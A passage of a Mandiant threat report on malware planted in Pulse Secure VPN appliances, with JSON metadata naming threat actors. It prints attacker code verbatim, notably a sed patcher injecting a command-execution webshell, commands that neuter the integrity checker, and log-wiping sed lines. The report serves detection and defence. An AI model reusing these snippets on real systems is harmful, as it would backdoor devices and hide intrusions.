(SHA256: 168976797d5af7071df257e91fcc31ce1d6e59c72ca9e2f50c8b5b3177ad83cc) is a\r\nwebshell implemented via modification of a legitimate Perl script used by a Pulse Secure tool which enables arbitrary\r\ncommand execution.\r\nThe attacker inserted two blocks of Perl code that implement the webshell. The source code modifications are surrounded by\r\ncomments that indicate the start and end of inserted code. The comment strings used\r\nare ##cgistart1, ##cgiend1, ##cgistart2 and ##cgiend2. Although the exact purpose of these comment strings is unknown, the\r\nattacker may use them to facilitate updates to the malicious code or to allow for its quick removal if necessary.\r\nThe Perl script enclosed in the tags ##cgistart1 and ##cgiend1 adds several lines to import Perl modules that are used\r\nby the webshell. It also adds a function to parse parameters of received command data.\r\nThe script enclosed in the tags ##cgistart2 and ##cgiend2 is responsible for checking web requests designed to be\r\nexecuted by the webshell, if present. If no webshell request is found, the script passes execution to the legitimate Perl\r\nscript for the webpage.\r\nThe webshell portion of the script is invoked when it receives a form submission name=value pair of serverid matching a\r\nsecret key. This causes the webshell to extract the string passed to it via the QUERY_STRING CGI environment variable.\r\nIndividual key/value pairs delimited by the \u0026 character and are URL decoded. Although the script parses out all key/value\r\npairs it receives, it specifically looks for and extracts data associated with the cmd parameter. If found, it will generate a\r\nform containing the extracted cmd to be executed and the previous serverid value along with a form submission button\r\nnamed Run. Upon submission, the webshell will execute the passed command on the victim host's command line and\r\ndisplay the results to the attacker before exiting. If no cmd value was extracted, the webshell will simply output\r\na \u003c/pre\u003e HTML tag.\r\nPULSECHECK\r\nThe file secid_canceltoken.cgi (SHA256: a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1) is a\r\nwebshell written in Perl that enables arbitrary command execution. With a properly formatted request, the script will execute\r\nwebshell code. Otherwise, the legitimate welcome page of the Pulse Secure VPN software is presumably invoked.\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 13 of 19\n\nThe script checks for web requests using the HTTP POST method and, if found, will further check the HTTP request\r\nheaders for the CGI environment variable HTTP_X_KEY. If this header matches a backdoor key, then the malware will\r\noutput the result of the command sent in the variable HTTP_X_CMD. This data is RC4 encrypted and base64-encoded. The\r\npassphrase to decrypt is sent in the environment variable HTTP_X_CNT. The webshell will set the content type to Content-type:text/html and the command output printed. Following this, the script exits.\r\nQUIETPULSE\r\nThe file dsserver (SHA256: 9f6ac39707822d243445e30d27b8404466aa69c61119d5308785bf4a464a9ebd) is a legitimate\r\nPerl script with malicious modifications to fork the child process /home/bin/dshelper. The dshelper script does not exist on a\r\nclean PulseSecure installation, this file is described as QUIETPULSE Utility Script.\r\nQUIETPULSE Utility Script\r\nThe file dshelper (SHA256: c774eca633136de35c9d2cd339a3b5d29f00f761657ea2aa438de4f33e4bbba4) is a shell script\r\ninvoked by a malicious version of dsserver that primarily functions as a utility script responsible for copying files and\r\nexecuting commands. Like the ATRIUM patcher, this script accesses /tmp/data, a path which is used during a system\r\nupgrade. This file is therefore, like the ATRIUM patcher, used by the attacker to maintain persistence. The script is set to\r\nexecute in a loop where four main checks are executed every two minutes. The checks are as follows:\r\nCheck 1\r\nIf /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi exists and is non-empty then execute:\r\ngrep -c -s 'system($depara)' /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nIt checks if the file has the contents system($depara). If the file does not contain this content, then retrieve the first line of\r\nthe file by executing:\r\nsed -n 1p /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nThen copy a file via:\r\ncp /home/webserver/htdocs/dana-na/auth/compcheckjava.cgi /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nThen replace the copy’s first line with the one retrieved from the sed above via:\r\nsed -i 1c\"\u003cvaries\u003e\" /tmp/data/root/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi\r\nCheck 2\r\nIf /tmp/data/root/home/bin/ exists as a directory, then check if the file /tmp/data/root/home/bin/dshelper does not exist. If it\r\ndoes not exist, then place it there by copying a file via:\r\ncp -p /home/bin/dshelper /tmp/data/root/home/bin/\r\nCheck 3\r\nIf /tmp/data/root/home/bin/dsserver exists and is non-empty then execute the following to check if the file does not contain\r\nthe string exec(\"/home/bin/dshelper\"):\r\ngrep -c -s 'exec(\"/home/bin/dshelper\")' /tmp/data/root/home/bin/dsserver\r\nIf it doesn't then execute to insert the line:\r\nsed -i 's/for (;;)/my $monpid = fork();\\nif ($monpid == 0) {\\nexec(\\\"\\/home\\/bin\\/dshelper\\\");\\n}\\n\u0026/g'\r\n/tmp/data/root/home/bin/dsserver\r\nCheck 4\r\nIf the file /tmp/data/root/home/bin/check_integrity.sh exists and is non-empty, then check if the file contains the string exit\r\n1 by executing:\r\ngrep -c -s 'exit 1' /tmp/data/root/home/bin/check_integrity.sh\r\nIf the file does contain this content, then execute the following to switch the content to exit 0:\r\nsed -i 's/exit 1/exit 0/g' /tmp/data/root/home/bin/check_integrity.sh\r\nPULSEJUMP\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 14 of 19\n\nThe file with SHA256: 7fa71a7f76ef63465cfeacf58217e0b66fc71bc81d37c44380a6f572b8a3ec7a is a system information\r\nand credential harvesting Perl script. The sample writes information from multiple sources to the\r\nfile /tmp/dsactiveuser.statementcounters in append mode.\r\nThe sample begins by retrieving all auth servers via the API AuthAdmin::getAllAuthServers. and logs the results. Next, the\r\nsample logs all roles via the API DSRole::GeneralAdmin::getRoles and writes the values to the file. The sample may also\r\nretrieve and log additional information depending on the device configuration.\r\nHARDPULSE\r\nThe file compcheckjava.cgi (SHA256: 1d3ab04e21cfd40aa8d4300a359a09e3b520d39b1496be1e4bc91ae1f6730ecc) has the\r\nability to read and write arbitrary files and may execute arbitrary commands depending on the implementation of a particular\r\nlibrary function.\r\nThe sample responds to HTTP GETs and PUTs. The GET path is not relevant, but the PUT path first checks if the incoming\r\nrequests checkcode POST param is equal to a hardcoded passcode. If this check passes the sample inspects the\r\nparam hashid to determine if it's non-empty. If non-empty the sample displays a prompt to the user that includes hardware\r\ninformation and then base64 decodes the param hashid and checks it against pulsesecure. If this matches a recoveryToken is\r\ngenerated which is the MD5 hash of 16 random bytes, with the result hash truncated to 8 characters. This token is then\r\ndisplayed to the user via the URL https://ive-host/dana-na/auth/recover[.]cgi?token=\u003cvaries\u003e and the sample exits. If this\r\ncheck did not match then the sample passes the base64 decoded data to a routine DSSafe::psystem which may execute shell\r\ncommands, however this implementation is not provided and is speculation.\r\nIf the param hashid is empty the sample instead checks that the param m is non-empty. If so, it's matched against get and put\r\nwhich will read/write arbitrary files to the host, respectively.\r\nATRIUM\r\nThe file compcheckresult.cgi (SHA256: f2b1bd703c3eb05541ff84ec375573cbdc70309ccb82aac04b72db205d718e90) is a\r\nwebshell capable of arbitrary command execution. The sample has malicious logic inserted at the end of legitimate logic.\r\nThe malicious logic inspects all requests of any type looking for the HTTP query parameter id. If this query parameter\r\nexists, the sample executes it verbatim on using the system API. The sample does not encode or obfuscate the command in\r\nany way. If the query parameter is not found in the request, then the original legitimate logic is invoked.\r\nPersistence Patcher\r\nThe file DSUpgrade.pm (SHA256: 224b7c45cf6fe4547d3ea66a12c30f3cb4c601b0a80744154697094e73dbd450) is a\r\npatcher utility script responsible for persisting webshells across a system upgrade. We’ve observed variants of this utility\r\ntargeting the persistence of multiple webshell families, notably ATRIUM, STEADYPULSE, and PULSECHECK. Like\r\nprevious patchers, this sample uses sed to insert malicious logic. The attacker likely chose DSUpgade.pm to host their patch\r\nlogic as it is a core file in the system upgrade procedure, ensuring the patch is during updates. The patcher modifies content\r\nin /tmp/data as this directory holds the extracted upgrade image the newly upgraded system will boot into. This results in a\r\npersistence mechanism which allows the attacker to maintain access to the system across updates.\r\nmy $cmd_x=\"sed -i '/echo_console \\\"Saving package\\\"/i(    sed -i \\\\\\'/main();\\\\\\$/cif(CGI::param(\\\\\\\\\\\"id\\\\\\\\\\\")){        print\r\n\\\\\\\\\\\"Cache-Control: no-cache\\\\\\\\\\\\\\\\n\\\\\\\\\\\";        print \\\\\\\\\\\"Content-type: text/html\\\\\\\\\\\\\\\\n\\\\\\\\\\\\\\\\n\\\\\\\\\\\";        my\r\n\\\\\\\\\\$na=CGI::param(\\\\\\\\\\\"id\\\\\\\\\\\");        system(\\\\\\\\\\\"\\\\\\\\\\$na\\\\\\\");    } else{        \u0026main();    }\\\\\\' /tmp/data/root$cgi_p;    cp -f\r\n/home/perl/DSUpgrade.pm /tmp/data/root/home/perl;    cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)'/pkg/do-install\";\r\nThe patcher also performs additional shell commands for unpacking a compressed package:\r\nsystem(\"/bin/mount -o remount,rw /dev/root /\");system(\"/bin/tar\", \"-xzf\", \"/tmp/new-pack.tgz\", \"-C\",\r\n\"/tmp\",\"./installer\");system(\"cp -f /tmp/installer/do-install /pkg/\");system(\"cp -f /tmp/installer/VERSION /pkg/\");system(\"cp\r\n-f /tmp/installer/sysboot-shlib /pkg/\");system(\"cp -f /tmp/installer/losetup /pkg/\");\r\nPACEMAKER\r\nThe file memread (SHA256: 68743e17f393d1f85ee937dffacc91e081b5f6f43477111ac96aa9d44826e4d2) is a credential\r\nstealer. The sample has the usage information:\r\nUsage: memread [-t time(minute)] [-m size(MB)] [-s sleep_interval(second)]\r\nThe sample starts by setting an alarm that kills the application after a configurable number of minutes, 14 by default. It then\r\nenters a loop which reads /proc/ entries every 2 seconds looking for a target application, this interval is also configurable.\r\nThe target is found by opening /proc/\u003cprocess_name\u003e/cmdline for each entry in the folder and then reading this file looking\r\nfor the string dswsd within the command line. Once found the target application's proc/\u003ctarget_pid\u003e/mem is opened, the\r\nprocess is attached to with PTRACE, then memory read in chunks up to 512 bytes in size. For each chunk, the string 20 30\r\n20 0A 00 ( 0 \\n) is searched for as a needle. If found the sample splits the data by first space, then a dash -. Two dashes are\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 15 of 19\n\nexpected to be found, and these are immediately converted into hex numbers, example form: -\u003cnumber\u003e. If the second\r\nnumber minus the first is \u003e 8191 the sample reads the data starting at the file offset of the first number, up to a size specified\r\nby second number minus first number.\r\nOnce the sample has read the process memory and found all memory data of interest the sample detaches PTRACE then the\r\nsample begins memory scanning the copied data. The sample tries to locate a sequence of 'flags' in memory one by one to\r\nlocate what seem to be information the attacker wishes to steal. This information is not known, nor is the structure of it. The\r\nsequences scanned for generally have start and end scan sequences which in order scanned for, are:\r\nUSER_START_FLAG: 3C 05 08 75 73 65 72 4E 61 6D 65 05 01 3E 05 00USER_END_FLAG: 3C 2F 05 08 75 73 65 72\r\n4E 61 6D 65 05 01 3E 00PASSWORD_START_FLAG: 3C 05 08 70 61 73 73 77 6F 72 64 05 01 3E\r\n00PASSWORD_END_FLAG: 3C 2F 05 08 70 61 73 73 77 6F 72 64 05 01 3E 00AUTHNUM_START_FLAG: 3C 05 0A\r\n61 75 74 68 4E 75 6D 62 65 72 05 01 3E 00AUTHNUM_END_FLAG: 3C 2F 05 0A 61 75 74 68 4E 75 6D 62 65 72 05 01\r\n3E 00\r\nIf all these sequences are found, the data between the start and end is extracted and eventually formatted and written to the\r\nfile /tmp/dsserver-check.statementcounters. The approximate format of this data is:\r\nName:\u003cusername\u003e || Pwd:\u003cpassword\u003e || AuthNum:\u003cauthnumber\u003e\\n\r\nThe sample replaces the following URL encoded values with their ascii representation for the password:\r\n\u0026amp; -\u003e  \u0026\u0026lt;  -\u003e  \u003c\u0026gt;  -\u003e  \u003e\r\nPACEMAKER Launcher Utility\r\nAs part of our investigation into PACEMAKER we were able to retrieve a simple bash script responsible for launching the\r\ncredential stealer. The launcher script hash\r\nSHA256 4c5555955b2e6dc55f52b0c1a3326f3d07b325b112060329c503b294208960ec launches PACEMAKER from a\r\nhardcoded path with options specifying a 16MB memory read size and a memory scan interval of 2 seconds, with a variable\r\nself-kill time.\r\n#!/bin/bash\r\n/home/bin/memread -t $1 -m 16 -s 2 \u0026\r\nTHINBLOOD Log Wiper Utility\r\nThe file dsclslog with SHA256 88170125598a4fb801102ad56494a773895059ac8550a983fdd2ef429653f079 is a log wiper\r\nutility. The sample provides the usage information:\r\nUsage: dsclslog -f [events|access] -r [Regex1,Regex2,Regex3,...]\r\nThe –f flag specifies if the file log.events.vc0 or log.access.vc0 within the directory /home/runtime/logs should be modified.\r\nTo perform its log cleaning operations the sample first makes two copies of whichever log file was chosen, but\r\nuses .vc1 and .vc2 as the extension for the new files. The file with the .vc1 is used to search for entries that match the given\r\nentries, and the file with the .vc2 extension is used as a temporary file where the cleaned log is written. After generating both\r\nfiles and log cleaning is finished the sample executes the following commands via the system API to overwrite the original\r\nlog with the cleaned version, then removes the intermediate:\r\nmv /home/runtime/logs/log.\u003clogtype\u003e.vc2/home/runtime/logs/log.\u003clogtype\u003e.vc0rm /home/runtime/logs/log.\u003clogtype\u003e.vc1\r\nTHINBLOOD LogWiper Utility Variant\r\nThe file clear_log.sh (SHA256: 1741dc0a491fcc8d078220ac9628152668d3370b92a8eae258e34ba28c6473b9) is a BASH\r\nscript responsible for zeroing log lines that match a given regex pattern. The sample is similar to the\r\ncompiled THINBLOOD Log Wiper but edits logs in-place with sed rather than making temporary copies. The sed\r\ncommands used are:\r\nsed -i \"s/.\\x00[^\\x00]*\u003cregex_string\u003e[^\\x00]*\\x09.\\x00//g\" /data/runtime/logs/\u003clogfile\u003e\r\nsed -i \"s/\\x\u003chex_char\u003e\\x00[^\\x00]*$2[^\\x00]*\\x09\\x\u003chex_char\u003e\\x00//g\" /data/runtime/logs/\u003clogfile\u003e\r\nThe sample embeds the usage information:\r\nusage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]\r\nLOCKPICK\r\nThe file libcrypto.so (SHA256: 2610d0372e0e107053bc001d278ef71f08562e5610691f18b978123c499a74d8) is a shared\r\nobject containing cryptographic logic from openssl. The sample contains a modification to the routine bnrand_range that\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 16 of 19\n\nbreaks the security of the random numbers generated. There are three paths in this routine for generating a random big\r\nnumber between a given range. The first case is unmodified and generates a zeroed big number, the other two cases are\r\npatched so that a constant value overwrites the generated random value and always returns success. This breaks the random\r\nnumber generation by replacing it with a value the attacker knows in all cases.\r\nLOCKPICK Patcher\r\nThe file with the hash b990f79ce80c24625c97810cb8f161eafdcb10f1b8d9d538df4ca9be387c35e4 is a patcher utility\r\nresponsible for inserting the malicious logic known as LOCKPICK. The patcher starts by running sed on the integrity\r\nchecker script built into the appliance to insert an early exit routine. This is inserted by the command sed -i '12aexit 0'\r\n/home/bin/check_integrity.sh which when applied causes this script to exit without performing its intended checks. After this\r\nthe sample uses python file read/write APIs to insert long strings of assembly that represent the logic known as LOCKPICK.\r\nThis file is different from the other patchers we’ve identified in that it is python and specifically targets system integrity\r\nroutines.\r\nDetecting the Techniques\r\nThe following table contains specific FireEye product detection names for the malware families associated with the\r\nexploitation of Pulse Secure VPN device.\r\nPlatform(s)  Detection Name \r\nNetwork Security \r\nEmail Security \r\nDetection On Demand \r\nMalware File\r\nScanning \r\nMalware File Storage\r\nScanning \r\nFE_APT_Webshell_PL_HARDPULSE_1FEC_APT_Webshell_PL_HARDPULSE_1APT.Webshell.PL.HARDPULSE\r\nFE_APT_Trojan_PL_PULSEJUMP_1FEC_APT_Trojan_PL_PULSEJUMP_1FE_Trojan_PL_Generic_1\r\nFE_APT_Trojan_PL_RADIALPULSE_1FEC_APT_Trojan_PL_RADIALPULSE_1FE_APT_Trojan_PL_RADIALPULSE_\r\nFE_APT_Trojan_Linux32_PACEMAKER_1FE_APT_Trojan_Linux_PACEMAKER_1\r\nFE_APT_Backdoor_Linux32_SLOWPULSE_1FE_APT_Backdoor_Linux32_SLOWPULSE_2 FE_APT_Trojan_Linux32_S\r\nFE_APT_Webshell_PL_STEADYPULSE_1 FEC_APT_Webshell_PL_STEADYPULSE_1 APT.Webshell.PL.STEADYPUL\r\nFE_APT_Trojan_Linux32_LOCKPICK_1\r\nFE_Webshell_PL_ATRIUM_1 FEC_Webshell_PL_ATRIUM_1FE_Trojan_SH_ATRIUM_1\r\nFE_APT_Webshell_PL_SLIGHTPULSE_1FEC_APT_Webshell_PL_SLIGHTPULSE_1APT.Webshell.PL.SLIGHTPULSE\r\nFE_APT_Webshell_PL_PULSECHECK_1FEC_APT_Webshell_PL_PULSECHECK_1\r\nFE_APT_Tool_Linux32_THINBLOOD_1 FE_APT_Tool_Linux_THINBLOOD_1      FE_APT_Tool_SH_THINBLOOD_1 \r\nFE_APT_Trojan_PL_QUIETPULSE_1FEC_APT_Trojan_PL_QUIETPULSE_1 FE_Trojan_SH_Generic_2 FEC_Trojan_SH\r\nSuspicious Pulse Secure HTTP request (IPS)\r\nEndpoint Security \r\nReal-Time (IOC)\r\nSLOWPULSE (BACKDOOR)\r\nPACEMAKER (LAUNCHER)\r\nTHINBLOOD (UTILITY)\r\nHelix VPN ANALYTICS [Abnormal Logon]EXPLOIT - SONICWALL ES [CVE-2021-20021 Attempt] EXPLOIT - SONICWALL\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID  Title \r\nA101-596  Malicious File Transfer - SLOWPULSE, Download, Variant #1 \r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 17 of 19\n\nA101-597  Malicious File Transfer - SLOWPULSE, Download, Variant #2 \r\nA101-598  Malicious File Transfer - SLOWPULSE, Download, Variant #3 \r\nA101-599  Malicious File Transfer - SLOWPULSE, Download, Variant #4 \r\nA101-600  Malicious File Transfer - SLOWPULSE, Download, Variant #5 \r\nA101-601  Malicious File Transfer - SLOWPULSE, Download, Variant #6 \r\nA101-602  Malicious File Transfer - SLOWPULSE, Download, Variant #7 \r\nA101-604  Malicious File Transfer - Pulse Secure Vulnerability, Utility, Download, Variant #1 \r\nA101-605  Malicious File Transfer - RADIALPULSE, Download, Variant #1 \r\nA101-606  Malicious File Transfer - PULSEJUMP, Download, Variant #1 \r\nA101-607  Malicious File Transfer - HARDPULSE, Download, Variant #1 \r\nA101-608  Malicious File Transfer - SLIGHTPULSE, Download, Variant #1 \r\nA101-609  Malicious File Transfer - LOCKPICK, Patcher, Download, Variant #1 \r\nA101-610  Malicious File Transfer - LOCKPICK, Download, Variant #1 \r\nA101-611  Malicious File Transfer - ATRIUM, Patcher, Download, Variant #1 \r\nA101-612  Malicious File Transfer - PACEMAKER, Launcher, Download, Variant #1\r\nA101-613  Malicious File Transfer - PACEMAKER, Download, Variant #1 \r\nA101-614  Malicious File Transfer - QUIETPULSE Utility, Download, Variant #1 \r\nA101-615  Malicious File Transfer - QUIETPULSE, Download, Variant #1 \r\nA101-616  Malicious File Transfer - STEADYPULSE, Download, Variant #2 \r\nA101-617  Malicious File Transfer - STEADYPULSE, Download, Variant #1 \r\nA101-618  Malicious File Transfer - ATRIUM, Download, Variant #1 \r\nA101-619  Malicious File Transfer - THINBLOOD, Download, Variant #1 \r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 18 of 19\n\nA101-620  Malicious File Transfer - THINBLOOD, Download, Variant #2 \r\nA101-621  Malicious File Transfer - PULSECHECK, Download, Variant #1 \r\nA101-622  Malicious File Transfer - PULSECHECK, Download, Variant #2 \r\nA104-757  Host CLI - QUIETPULSE Utility, Check, Variant #1 \r\nA104-758  Host CLI - QUIETPULSE Utility, Check, Variant #2 \r\nA104-759  Host CLI - QUIETPULSE Utility, Check, Variant #3 \r\nA104-760  Host CLI - QUIETPULSE Utility, Check, Variant #4 \r\nAcknowledgements\r\nMandiant would like to thank the Stroz Friedberg DFIR and Security Testing teams for their collaboration with the analysis\r\nand research. The team would also like to thank Joshua Villanueva, Regina Elwell, Jonathan Lepore, Dimiter Andonov, Josh\r\nTriplett, Jacob Thompson and Michael Dockry for their hard work in analysis and blog content.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.mandiant.com/resources/blog/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day" ], "report_names": [ "suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day" ], "threat_actors": [ { "id": "7e75ee53-c4d3-4260-8106-ed7b61d35f02", "created_at": "2023-12-08T02:00:05.765868Z", "updated_at": "2026-04-10T02:00:03.497413Z", "deleted_at": null, "main_name": "UNC2630", "aliases": [], "source_name": "MISPGALAXY:UNC2630", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "13bedce4-3115-4563-afd5-068e3930e68e", "created_at": "2023-01-06T13:46:38.623775Z", "updated_at": "2026-04-10T02:00:03.042652Z", "deleted_at": null, "main_name": "APT5", "aliases": [ "KEYHOLE PANDA", "BRONZE FLEETWOOD", "TEMP.Bottle", "Mulberry Typhoon", "Poisoned Flight" ], "source_name": "MISPGALAXY:APT5", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e44de7cd-80f0-4f0e-a348-33da1947fd25", "created_at": "2023-12-08T02:00:05.724516Z", "updated_at": "2026-04-10T02:00:03.489003Z", "deleted_at": null, "main_name": "UNC2717", "aliases": [], "source_name": "MISPGALAXY:UNC2717", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6d69ef1b-b6f3-47e1-be5a-87ac0fd5ff55", "created_at": "2024-04-24T02:00:49.599348Z", "updated_at": "2026-04-10T02:00:05.303948Z", "deleted_at": null, "main_name": "APT5", "aliases": [ "APT5", "Mulberry Typhoon", "BRONZE FLEETWOOD", "Keyhole Panda", "UNC2630" ], "source_name": "MITRE:APT5", "tools": [ "Tasklist", "PoisonIvy", "RAPIDPULSE", "PcShare", "Mimikatz", "SLOWPULSE", "SLIGHTPULSE", "Skeleton Key", "gh0st RAT", "PULSECHECK", "netstat" ], "source_id": "MITRE", "reports": null }, { "id": "47a8f6c7-5b29-4892-8f47-1d46be71714f", "created_at": "2025-08-07T02:03:24.599925Z", "updated_at": "2026-04-10T02:00:03.720795Z", "deleted_at": null, "main_name": "BRONZE FLEETWOOD", "aliases": [ "APT5 ", "DPD ", "Keyhole Panda ", "Mulberry Typhoon ", "Poisoned Flight ", "TG-2754 " ], "source_name": "Secureworks:BRONZE FLEETWOOD", "tools": [ "Binanen", "Comfoo", "Gh0st RAT", "Isastart", "Leouncia", "Marade", "OrcaRAT", "PCShare", "Protux", "Skeleton Key", "SlyPidgin", "VinSelf" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434155, "ts_updated_at": 1775792144, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.pdf", "text": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.txt", "img": "https://archive.orkl.eu/2e1f557e18c735ef48576df8ad89e8d7f5f07be2.jpg" } }